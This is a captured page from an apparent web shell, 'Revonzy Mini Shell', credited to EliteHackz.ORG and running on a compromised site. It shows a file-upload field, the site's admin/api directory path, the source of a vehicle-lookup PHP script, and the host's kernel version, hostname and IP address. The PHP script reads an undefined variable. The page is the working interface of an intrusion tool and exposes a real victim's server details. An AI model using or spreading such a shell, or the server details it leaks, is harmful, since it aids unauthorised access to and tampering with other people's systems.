Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/vahtuksanghatana.com/admin/api/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/vahtuksanghatana.com/admin/api/vehicle-detail-view.php

<?php
	require_once("../lib/function.php");
	$db = new login_function();
	
	$flag = 0;
	$response = array();
	
	if(isset($_POST['record_id']))
	{
    	$sell_vehicle_data = array();
    	$sell_vehicle_data = $db->get_sell_purchase_approved_for_app_from_record_id($record_id);
    	
    	if(!empty($sell_vehicle_data))
    	{
    		$response["status"] = 1;
            $response["message"] = $sell_vehicle_data;
    	}
    	else{
    		$response["status"] = 0;
            $response["message"] = "No Vehicles Available";
    	}
	}
	else
	{
	    $response["status"] = 0;
        $response["message"] = "No Key Found";
	}
	echo json_encode($response);
?>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4